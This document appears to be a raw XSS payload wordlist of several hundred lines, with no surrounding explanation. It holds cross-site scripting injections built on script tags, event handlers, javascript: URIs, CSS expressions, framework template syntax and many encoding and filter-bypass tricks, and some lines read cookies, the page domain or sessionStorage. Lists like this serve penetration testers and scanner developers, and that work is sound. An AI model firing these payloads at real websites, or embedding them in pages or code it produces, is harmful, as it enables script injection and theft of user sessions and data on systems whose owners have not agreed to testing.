0xd3adc0de&lt;ScRiPt&gt;alert('XSS Success!')&lt;/sCripT&gt;
0xd3adc0de<ScRiPt>alert('XSS Success!')</sCripT>
1"--></script><svg/onload=';alert(document.domain);'>
1"><%3Csvg onload=alert%28document.cookie%29>'
1%22onfocus=%27window.alert%28document.cookie%29%27%20autofocus=
1&"><script>alert(1)</script>=1
1&a%2522%253e%253cscript%253ealert%2528/xss/%2529%253c%252fscript%253e
1'"();<test><ScRiPt>alert("XSS_WAF_BYPASS")</ScRiPt>
1'"();<test><ScRiPt>window.alert("XSS_WAF_BYPASS")</ScRiPt>
1'"();<test><iframe onload="window.alert('XSS_WAF_BYPASS')"></iframe>
1'"><img/src/onerror=.1|alert``>
10</option></select><img/src=xon=()onx+honerror=alert(1)>ss<svg/onload=prompt(document.domain)%20>
12&<script>alert(123)</script>=123
123')});alert(1);(()=>{('
1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>
1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=javascript:alert(1)&gt;>
1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=javascript:alert(1)&gt;`>
23;%0adocument.body.innerHTML=location.hash;//#<svg/onload=alert(23)>
3Cscript%3Ealert(1)%3C%2Fscript%3E
3Cscript%3Ealert(1)%3C%2Fscript%3E##1
444-555-4455 <img src=x onerror=alert(1)>
; alert(1);//
;alert(123);
;alert(String.fromCharCode(88,83,83))// ></SCRIPT> > ><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
< / script >< script >alert(123)< / script >
<! foo="><script>javascript:alert(1)</script>">
<! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>">
<!--<img src="--><img src=x onerror=javascript:alert(/AmoloHT/)//">
<!--<img src="--><img src=x onerror=javascript:alert(1)//">
<!--><svg onload=alert(1)-->
<!--><svg onload=alert(1)-->.asp
<!--><svg onload=alert(1)-->.aspx
<!--><svg onload=alert(1)-->.html
<!--><svg onload=alert(1)-->.php
<!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]-->
<!--[if<img src=x onerror=javascript:alert(1)//]>-->
<!--[if]><script>javascript:alert(1)</script-->
<!--\x3E<img src=xxx:x onerror=javascript:alert(1)> -->
<!--jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e-->
<!--xss"><img src=x onerror=alert(1)>-->
<!</textarea <body onload='alert(1)'>
<!<script>alert(1)</script>
<!<script>alert(1)</script> “
<!<script>alert(4)</script>
<!<script>alert(document.domain)</script>
<![><img src="]><img src=x onerror=javascript:alert(/AmoloHT/)//">
<![><img src="]><img src=x onerror=javascript:alert(1)//">
<"><details/open/ontoggle="jAvAsCrIpT&colon;alert&lpar;/xss-by-tarun/&rpar;">XXXXX</a>
<% foo><x foo="%><script>javascript:alert(1)</script>">
<%<!--'%><script>alert(1);</script -->
<%<script>alert(1)</script>
<%tag onmouseover="alert('markitzeroday.com')">
<--%253cimg%20onerror=alert(1)%20src=a%253e --!>
<--`<img%2fsrc%3d` onerror%3dalert(document.domain)> --!>
<--`<img/src=` onerror=alert(1)> --!>
</ foo="><script>javascript:alert(1)</script>">
<///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN
</> " <a+HREF='%26%237javascrip%26%239t:alert%26lpar;document.domain)'> " </>
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
</a onmousemove="alert(1)">
</a onmousemove=alert(1)>
</b><script>alert(document.cookie)</script><b><!--
</br style=a:expression(alert(1))>
</h1><script>alert(1)</script><h1>
</option><img src=x onerror=alert(origin)>
</script><body/onload=alert(m3ez)>
</script><script>alert('XSS');</script>
</script><script>alert('You got XSSed')</script>
</script><script>alert(1)</script>
</script><script>alert(123)</script>
</script><svg onload=alert(1)>
</script><svg/onload=alert(0)>
</script><svg><script>alert(1)-%26apos%3B
</style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-(
</style></scRipt><scRipt>alert(1)</scRipt>
</style></script><script>alert("XSS")</script>
</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera}
</tag><svg onload=alert(1)>
</title><script>alert(document.domain)</script>
<<SCRIPT>alert( XSS );//<</SCRIPT>
<<SCRIPT>alert("XSS");//\<</SCRIPT>
<<SCRIPT>alert("test");//<</SCRIPT>
<<SCRIPT>alert(1);//<</SCRIPT>
<<TexTArEa/*%00//%00*/a="not"/*%00///AutOFocUs////onFoCUS=alert`1` //
<<script>alert("WXSS");//<</script>
<=script>=alert("hacked")<=/scirpt>=
<><img src=1 onerror=alert(1)>
<? foo="><script>javascript:alert(1)</script>">
<? foo="><x foo='?><script>javascript:alert(1)</script>'>">
<?php echo('<SCR'); echo('IPT>alert("XSS")</SCRIPT>'); ?>
<?tag x="-->" test="<img src=x onerror=alert(1)//">
<?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html>
<BASE HREF="javascript:alert('XSS');//">
<BASE HREF="javascript:javascript:alert(1);//">
<BGSOUND SRC="javascript:alert('XSS');">
<BGSOUND SRC="javascript:javascript:alert(1);">
<BODY BACKGROUND="javascript:alert('XSS')">
<BODY ONLOAD=alert('XSS')>
<BODY ONLOAD=javascript:alert(1)>
<BODY ONLOAD=javascript:javascript:alert(1)>
<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<BR SIZE="&{alert('XSS')}">
<BR SIZE="&{javascript:alert(1)}">
<DIV STYLE="background-image: url(&#1,javascript:alert('XSS))">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image: url(javascript:javascript:alert(1))">
<DIV STYLE="width: expression(alert('XSS'));">
<DIV STYLE="width:expression(javascript:alert(1));">
<DIV+STYLE="background-image: url(javascript:alert(1))">
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET>
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<IFRAME SRC="javascript:alert(document.cookie);"></IFRAME>
<IFRAME SRC="javascript:alert(document.cookie);"></iframe>'
<IFRAME SRC="javascript:javascript:alert(1);"></IFRAME>
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
<IMG    ><SCRIPT>alert( XSS )</SCRIPT> >
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG """><SCRIPT>alert("XSS")</SCRIPT>"\>
<IMG DYNSRC="javascript:alert('XSS')">
<IMG DYNSRC="javascript:javascript:alert(1)">
<IMG LOWSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:javascript:alert(1)">
<IMG SRC= jav ascript:alert( XSS ); >
<IMG SRC= jav&#x09;ascript:alert( XSS ); >
<IMG SRC= onmouseover="alert('xxs')"
<IMG SRC= onmouseover="alert('xxs')">
<IMG SRC=" &#14;  javascript:alert('XSS');">
<IMG SRC=" &#14; javascript:alert('XSS');">
<IMG SRC="`<javascript:alert>`('XSS')"
<IMG SRC="jav    ascript:javascript:alert(1);">
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav&#x09;ascript:alert('XSS');">
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
<IMG SRC="javascript:alert('XSS')"
<IMG SRC="javascript:javascript:alert(1)"
<IMG SRC="javascript:javascript:alert(1);">
<IMG SRC=# onmouseover="alert('xxs')">
<IMG SRC=&{javascript:alert(1);};>
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<IMG SRC=`javascript:javascript:alert(1)`>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=javascript:javascript:alert(1)>
<IMG SRC=”javascript:alert(‘XSS’)”
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
<IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1))">
<IMG onmouseover="alert('xxs')">
<IMG%20"""><SCRIPT>alert("WXSS")</SCRIPT>">
<IMG%20DYNSRC="javascript:alert('WXSS')">
<IMG%20LOWSRC="javascript:alert('WXSS')">
<IMG%20SRC="%20&#14;%20javascript:alert('WXSS');">
<IMG%20SRC="jav	ascript:alert('WXSS');">
<IMG%20SRC="jav&#x09;ascript:alert('WXSS');">
<IMG%20SRC="jav&#x0A;ascript:alert('WXSS');">
<IMG%20SRC="jav&#x0D;ascript:alert('WXSS');">
<IMG%20SRC="javascript:alert('WXSS')"
<IMG%20SRC="javascript:alert('WXSS');">
<IMG%20SRC='javasc	ript:alert(document.cookie)'>
<IMG%20SRC='javascript:alert(document.cookie)'>
<IMG%20SRC=JaVaScRiPt:alert('WXSS')>
<IMG%20SRC=`javascript:alert("'WXSS'")`>
<IMG%20SRC=javascript:alert(&quot;WXSS&quot;)>
<IMG%20SRC=javascript:alert('WXSS')>
<IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG+DYNSRC="javascript:alert(1);">
<IMG+LOWSRC="javascript:alert(1);">
<IMG+SRC="jav#x0D;ascript:alert(1);">
<IMG+SRC="jav&#x0A;ascript:alert(1);">
<IMG+SRC=j&#X41vascript:alert(1)>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);">
<INPUT+TYPE="IMAGE"+SRC="javascript:alert(1);">
<Img Src=On OnError=alert(1)>
<Img src = x onerror = "javascript: window.onerror = alert; throw XSS">
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<LINK REL="stylesheet" HREF="javascript:javascript:alert(1);">
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);">
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);">
<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT>
<P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1)">
<P/onpointerenter=alert(1)>
<Rxss onscrollend=alert(origin) style="display:block;overflow:auto;border:1px dashed;width:500px;height:100px;"><br>++</Rxss>
<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(/AmoloHT/)</SCRIPT>
<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT>
<SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT>
<SCRIPT>a=/XSS/%0Aalert(a.source)</SCRIPT
<STYLE TYPE="text/javascript">javascript:alert(1);</STYLE>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE>
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
<STYLE>.XSS{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=XSS></A>
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE>
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
<STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>XSS
<STYLE>li+{list-style-image:url("javascript:alert(1)");}</STYLE><UL><LI>
<STYLE>li+{list-style-image:url("javascript:alert(1)");}</STYLE><UL><LI>1
<ScRiPt>alert(1)</ScRiPt>
<ScRiPt>alert(1)</sCriPt>
<ScRipt>ALeRt("hi");</sCRipT>
<ScripT>alert(1234)</ScRipT>
<Script>alert()</Script>
<Svg On Only=1 Onload=alert("hex")>
<Svg On Only=1 Onload=alert(1)>
<TABLE BACKGROUND="javascript:alert('XSS')">
<TABLE BACKGROUND="javascript:javascript:alert(1)">
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
<TABLE><TD BACKGROUND="javascript:javascript:alert(1)">
<Video> <source onerror = "javascript: alert (XSS)">
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(1);">]]</C><X></xml>
<XSS STYLE="Xss:expressionfalert('XSS'))">
<XSS STYLE="xss:expression(alert('XSS'))">
<XSS STYLE="xss:expression(javascript:alert(1))">
<[%00]img onerror=alert(1) src=a>
<a @['c\lic\u{6b}']="_c.constructor('alert(1)')()">test</a>
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaaa href=javascript:alert(1)>xss</a>
<a href="  &#x8; &#23;   javascript:alert('Successful XSS')">Click this link!</a>
<a href="&#0000106avascript:alert(1)">XSS</a>
<a href="&#106;avascript:alert(2)">a</a>
<a href="&#X6A;avascript:alert(1)">XSS</a>
<a href="&#x6a;avascript:alert(1)">XSS</a>
<a href="/*">*/)});function+__MobileAppList(){alert(1)}//>
<a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>
<a href="jaVasCript:/*-/*`/*\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e">click me</a>
<a href="jav%0Dascript&colon;alert(1)">
<a href="jav&#65ascript:javascript:alert(1)">test1</a>
<a href="jav&#97ascript:javascript:alert(1)">test1</a>
<a href="jav&#x61script:alert(3)">a</a>
<a href="javascript:alert(1)">a</a>
<a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A">
<a href="javascript:var a='&apos;-alert(1)-&apos;'">a</a>
<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>
<a href="javascript:x='%27-alert(1)-%27';">XSS</a>
<a href="javascript:x='&percnt;27-alert(1)-%27';">XSS</a>
<a href=&#01javascript:alert(1)>
<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>">
<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a>
<a href=javas&#99;ript:alert(1)>
<a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>
<a href=javascript:alert(1)>click
<a href=”javas cript:alert(document.cookie)” >Testing.com </a>
<a id=x tabindex=1 onfocus=alert(1)></a>
<a onmouseover%3D"alert(1)">xss
<a onmouseover="alert(document.cookie)">xxs link</a>
<a onmouseover=alert(document.cookie)>xxs link</a>
<a onpaste="alert(1)" contenteditable>test</a>
<a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">XXX</a>
<a+HREF="%26%237 javascrip%26%239t: alert%261par;document .domain) *>
<a+HREF='%26%237javascrip%26%239t:alert%26lpar;document.domain)'>
<a+href="javas&#99;ript&#35;alert(1);">
<a/href="j&Tab;a&Tab;v&Tab;asc&Tab;ri&Tab;pt:alert&lpar;1&rpar;">
<a/href="jav%09%0dascri%09%0dpt%26%23x0000000000000000000000000000000003a; alert%26%23x28;%26%23x29;'>CLICK
<a/href="javascript%0A%0D:alert()">
<a/href=%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x0a;:alert(1)>please%20click%20here</a>
<a/href=&#74;ava%0a%0d%09script&colon;alert()>click
<a/href=javascript&colon;alert()>click
<a2 onfocus=alert(1) autofocus tabindex=1>
<acronym id=x tabindex=1 onfocus=alert(1)></acronym>
<address id=x tabindex=1 onfocus=alert(1)></address>
<applet code="javascript:alert('XSS')"></applet>
<applet id=x tabindex=1 onfocus=alert(1)></applet>
<applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1)"></applet onReadyStateChange>
<applet onerror applet onerror="javascript:javascript:alert(1)"></applet onerror>
<applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1)"></applet onreadystatechange>
<audio autoplay onloadedmetadata=alert(1)> <source src="validaudio.wav" type="audio/wav"></audio>
<audio controls ondurationchange=alert(1)><source src=validaudio.mp3 type=audio/mpeg></audio>
<audio controls onprogress=alert(1)><source src=validaudio.mp3 type=audio/mpeg></audio>
<audio oncanplay=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
<audio src onloadstart=alert(1)>
<audio src(unknown) onerror="alert(document.cookie)">
<audio src/onerror=alert(1)>
<audio src="nonexistent.mp3" onerror="alert(1)"></audio>
<audio src=1 onerror=alert(1)>
<b <script>alert(1)</script>0
<b/%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35mouseover=alert(1)>
<base href="alert(1)" onfocus="a = /\/([^/]+)$/.exec(baseURI); eval(a[1]);" tabindex=1 style="display:block" autofocus></base>
<base href="javascript:alert('XSS');">
<base+href="javascript:alert(1);//">
<bgsound onpropertychange=alert(1)>
<bgsound src="javascript:alert('XSS');">
<bgsound+src="javascript:alert(1);">
<body background="javascript:alert('Successful XSS')">
<body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body onMouseMove>
<body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState>
<body onResize body onResize="javascript:javascript:alert(1)"></body onResize>
<body onactivate=alert(1)>
<body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body onbeforeunload>
<body onblur body onblur="javascript:javascript:alert(1)"></body onblur>
<body onfocus body onfocus="javascript:javascript:alert(1)"></body onfocus>
<body onfocusin=alert(1)>
<body oninput=javascript:alert(/AmoloHT/)><input autofocus>
<body oninput=javascript:alert(1)><input autofocus>
<body onkeydown body onkeydown="javascript:javascript:alert(1)"></body onkeydown>
<body onkeyup body onkeyup="javascript:javascript:alert(1)"></body onkeyup>
<body onload body onload="javascript:javascript:alert(1)"></body onload>
<body onload="window.alert('XSS_WAF_BYPASS')">
<body onload=alert(/XSS/.source)>
<body onload=alert(“bingo”)>
<body onload=print()>
<body onorientationchange=alert(1)>
<body onpagehide body onpagehide="javascript:javascript:alert(1)"></body onpagehide>
<body onpageshow=alert(1)>
<body onscroll=alert(1)><div style=height:1000px></div><div id=x></div>
<body ontouchend=alert(1)>
<body ontouchmove=alert(1)>
<body ontouchstart=alert(1)>
<body onunload body onunload="javascript:javascript:alert(1)"></body onunload>
<body/onload=&lt;!--&gt;&#10alert(1)>
<brute+onbeforescriptexecute=a=alert,a(1%26%23x29>
<button autofocus onfocus=alert(1)>test</button>
<button formaction="javascript:alert('XSS')">Click me</button>
<button onClick="alert('xss')">Submit</button>
<command onclick="alert('XSS')">Command</command>
<comment><img src="</comment><img src=x onerror=javascript:alert(/AmoloHT/))//">
<comment><img src="</comment><img src=x onerror=javascript:alert(1))//">
<component is=script text=alert(1)>
<data id=x tabindex=1 onfocus=alert(1)></data>
<datalist id="xss"><option value="&lt;script&gt;alert('XSS')&lt;/script&gt;"></datalist>
<details ontoggle=alert(1) open>test</details>
<details open id="' &quot;'"ontoggle=alert(1)>
<details open ontoggle="alert(1)"><summary>Click me!</summary></details>
<details open ontoggle="{alert`1`}"></details>
<details open ontoggle=prompt('XSS')>
<details/open/ontoggle="alert`1`">
<details/open/ontoggle=alert()>
<details/open=/Open/href=/data=;+ontoggle="(alert)(document.domain)
<dialog open onclose=alert(1)><form method=dialog><button>XSS</button></form>
<div data-url="javascript:alert('XSS')"></div>
<div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>
<div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script>
<div ng-app ng-csp><div ng-focus="x=$event;" id=f tabindex=0>foo</div><div ng-repeat="(key, value) in x.view"><div ng-if="key == 'window'">{{ [1].reduce(value.alert, 1); }}</div></div></div>
<div oncopy="alert('XSS')">Copy me</div>
<div onkeyup="alert('XSS')">Press a key</div>
<div onmouseover='alert&lpar;1&rpar;'>DIV</div>
<div onpointerenter="alert(45)">MOVE HERE</div>
<div style="background-image:url(javascript:alert('Successful XSS'))">
<div style="border-image-source: url(javascript:alert('XSS'));">
<div style="content: url(javascript:alert('XSS'));">
<div style="cursor: url(javascript:alert('XSS')), auto;">
<div style="list-style-image: url(javascript:alert('XSS'));">
<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>
<div style="width:expression(alert('XSS'))">
<div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x
<div v-html="''.constructor.constructor('alert(1)')()">a</div>
<div/onmouseover='alert(1)'> style="x:">
<div>jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e</div>
<embed code=javascript:javascript:alert(1);></embed>
<embed src="javascript:alert(1)">
<embed src=javascript:alert(1)>
<event-source src="%(event)s" onload="javascript:alert(1)">
<event-source src=javascript:alert(1)>
<fieldset form="javascript:alert('XSS')">
<font style='color:expression(alert(1))'>
<footer id=x tabindex=1 onfocus=alert(1)></footer>
<form action="javascript:alert('XSS')">
<form action="javascript:alert('XSS')"><input type="submit" value="XSS"></form>
<form action="javascript:alert(1)"><input type=submit id=x></form><label for=x>XSS</label>
<form action=javascript:alert(1)><input type=submit>
<form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X
<form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X
<form id=x tabindex=1 onfocus=alert(1)></form>
<form onfocus=alert(1) autofocus tabindex=1>
<form onsubmit="alert('XSS')">
<form><button formaction="javascript:javascript:alert(/AmoloHT/)">X
<form><button formaction="javascript:javascript:alert(1)">X
<form><button formaction=javascript&colon;alert(1)>CLICKME
<form><button formaction=javascript:alert(1)>click
<form><iframe &#09;&#10;&#11; src="javascript&#58;alert(/AmoloHT/)"&#11;&#10;&#09;;>
<form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;>
<form><input formaction=javascript:alert(1) type=image src=SOURCE>
<form><input formaction=javascript:alert(1) type=image value=click>
<form><input formaction=javascript:alert(1) type=submit value=click>
<frameset onBlur frameset onBlur="javascript:javascript:alert(1)"></frameset onBlur>
<frameset onload="alert('XSS')"></frameset>
<frameset onload=javascript:alert(/AmoloHT/)>
<frameset onload=javascript:alert(1)>
<frameset onload=javascript:javascript:alert(1)></frameset>
<frameset><frame id=x onfocus=alert(1)>
<h1 onfocus=alert(1) autofocus tabindex=1>
<h1/%6f%6e/oNclicK=alert``>XSS
<head id=x tabindex=1 onfocus=alert(1) style=display:block></head>
<head><base href="javascript://"></head><body><a href="/. /,javascript:alert(/AmoloHT/)//#">XXX</a></body>
<head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">XXX</a></body>
<hgroup onfocus=alert(1) autofocus tabindex=1>
<html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html onMouseMove>
<html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html onMouseOut>
<html onmousemove html onmousemove="javascript:javascript:alert(1)"></html onmousemove>
<html onmouseover html onmouseover="javascript:javascript:alert(1)"></html onmouseover>
<html ontouchcancel=alert(1)>
<html ontouchend=alert(1)>
<html ontouchmove=alert(1)>
<html ontouchstart=alert(1)>
<iMg onerror=alert(1) src=a>
<i[%00]mg onerror=alert(1) src=a>
<ifram%0de src=jav%0dascript:alert(document.cookie)>
<iframe SRC="javascript:alert('XSS');" //
<iframe SRC="javascript:alert('XSS');" <
<iframe name="<svg/onload=alert(23)>" src="http://example[.]com/x.php?age=23;%0adocument.body.innerHTML=name//">
<iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"></iframe onbeforeload>
<iframe onload iframe onload="javascript:javascript:alert(1)"></iframe onload>
<iframe src iframe src="javascript:javascript:alert(1)"></iframe src>
<iframe src-doc="<svg onload=alert (1337)&nvgt;"></iframe>
<iframe src="data:text/html,<script>alert(1)</script>"></iframe>
<iframe src="jaVasCript:/*-/*`/*\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e"></iframe>
<iframe src="javasc%0a%0dript:alert(0);">
<iframe src="javascript:alert('XSS')"></iframe>
<iframe src="javascript:alert(1)"></iframe>
<iframe src="javascript:alert(document.domain)"></iframe>
<iframe src=# onmouseover=alert(String.fromCharCode(88,83,83))></iframe>
<iframe src=j&#x61;vasc&#x72ipt&#x3a;alert&#x28;1&#x29;>
<iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>
<iframe src=javascript:alert(1)>
<iframe srcdoc="&LT;iframe&sol;srcdoc=&amp;lt;img&sol;src=&amp;apos;&amp;apos;onerror=javascript:alert(1)&amp;gt;>">
<iframe srcdoc="&lt;img src=1 onerror=alert(1)&gt;"></iframe>
<iframe srcdoc="<img src=1 onerror=alert(1)>"></iframe>
<iframe srcdoc="<script>alert(1)</script>"></iframe>
<iframe srcdoc=&lt;script&gt;alert&lpar;1&rpar;&lt;&sol;script&gt;></iframe>
<iframe srcdoc='<script>print()</script>'>
<iframe srcdoc='<script>prompt(document.domain)</script>'>
<iframe srcdoc=<svg/o&#x6Eload&equals;alert&lpar;1)&gt;>
<iframe+/ON+onload=%20alert(/str0d/)>
<iframe// src=javaSCRIPT&colon;alert(1)
<iframe/onload=alert(0);>
<iframe/onreadystatechange=alert(1)
<iframe/src="data:text/html,<svg &#111;&#110;load=alert(/AmoloHT/)>">
<iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>">
<iframe/src="data:text/html,<svg onload=alert(1)>">
<iframe><img title="</iframe><img src onerror=alert(1)>"></iframe>
<image id=x tabindex=1 onfocus=alert(1)></image>
<image src="javascript:alert(1)">
<image2 onfocus=alert(1) autofocus tabindex=1>
<img \x00src=x onerror="alert(1)">
<img border=3 alt=jaVasCript:/*-/*`/*\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e>
<img dynsrc="javascript:alert('Successful XSS')">
<img id=x tabindex=1 onfocus=alert(1)></img>
<img o[%00]nerror=alert(1) src=a>
<img onfocus=alert(1) autofocus tabindex=1>
<img src ?itworksonchrome?\/onerror = alert(1)
<img src @error=e=$event.composedPath().pop().alert(1)>
<img src @error=e=$event.path.pop().alert(1)>
<img src @error=this.alert(1)>
<img src onerror /" '"= alt=javascript:alert(1)//">
<img src/onerror=alert(1)>
<img src="" onerror="alert(document.cookie)">
<img src="abc" onerror="alert(1)">
<img src="invalid-image" onerror="alert('XSS');">
<img src="javascript:alert('XSS')" alt="Image">
<img src="javascript:alert(1)">
<img src="non-existent-image.jpg" onerror="alert(document.cookie);" />
<img src="x" onerror="alert(1)">
<img src="x:%90" title="onerror=alert(1)//">
<img src=# onerror\x3D"javascript:alert(1)" >
<img src='test' onmouseover='alert(2)'>
<img src='x' onerror='alert(1)'>
<img src=/ onerror=alert(1)>
<img src=1 href=1 onerror="javascript:alert('HEJAP ZAIRY AL-SHARIF')"></img>
<img src=1 onerror="a:b:c:d:alert(1)">
<img src=1 onerror=alert(1)>
<img src=`%00`&NewLine; onerror=alert(1)&NewLine;
<img src=``&NewLine; onerror=alert(1)&NewLine;
<img src=`javascript:alert("The name is 'XSS'")`>
<img src=`xx:xx`onerror=alert(1)>
<img src=asdf onerror=alert(JSON.stringify(sessionStorage))>
<img src=validimage.png onloadstart=alert(1)>
<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>
<img src=x onerror="alert(origin)">
<img src=x onerror=alert('XSS')//
<img src=x onerror=alert('XSS');>
<img src=x onerror=alert('from\u0020subcat\u0020title')>
<img src=x onerror=alert(1)>
<img src=x onerror=alert(123) />
<img src=x onerror=alert(String.fromCharCode(88,83,83));>
<img src=x onerror=alert(document.domain)>
<img src=x onerror=alert(“falcon”)>
<img src=x onerror=eval('al'+'ert(1)')>
<img src=x onerror=print()>
<img src=x onerror=prompt(document.domain)>
<img src=x onerror=window[`alert`](1)>
<img src=x:alert(alt) onerror=eval(src) alt='spyerror'>
<img src=x:alert(alt) onerror=eval(src) alt=0>
<img src=x:alert(alt) onerror=eval(src) alt=xss>
<img src=”invalid-image” onerror=”alert(document.cookie)”>
